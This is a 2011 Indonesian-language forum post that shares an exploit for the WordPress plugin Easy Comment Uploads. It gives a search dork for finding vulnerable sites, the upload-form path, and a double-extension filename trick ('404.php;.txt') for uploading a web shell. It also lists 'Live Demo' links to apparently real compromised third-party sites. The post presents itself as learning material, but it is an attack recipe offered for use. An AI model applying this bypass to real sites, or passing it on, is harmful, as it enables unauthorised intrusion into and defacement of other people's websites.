| satria | Date: Thursday, 2011-06-16, 1:20 PM | Message # 1 |
 Lieutenant colonel
Group: Administrators
Messages: 126
Status: Offline
| silahkan om nih ilmu yg baru ane dapat..
ayo belajar sama2 om ..
Exploit Wordpress "/easy-comment-uploads/upload-form.php" Devil-404
----------------------------------------------------------------------------
...| Title : Wordpress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Vendor: http://wordpress.org/extend/plugins/easy-comment-uploads/
| Email : me@zonedevil.om
| Date : 15/06/2011
| Dork : "/easy-comment-uploads/upload-form.php"
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Ubuntu]
----------------------------------------------------------------------------
*_Exploit_*
# http://[localhost]/[path]/easy-comment-uploads/upload-form.php
# http://[localhost]/easy-comment-uploads/upload-form.php
# File Extention [.txt],[.jpg],[gif],[bmp]
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/06/404.php;.txt
=========================================================
Live Demo :
http://eleventigers.net/111/wp-content/uploads/2011/06/devil.jpg
http://www.tremblantbar.com/wp-content/uploads/2011/06/devil.txt
http://www.tonicfoodclub.com/wp-content/uploads/2011/06/devil.txt
http://accentspaintingplus.com/wp-content/uploads/2011/06/devil.jpg
http://brownsupport.com/micholle/wp-content/uploads/2011/06/devil.txt
./Greetz : WanMadehope Cyber4rt
|
| |
| |
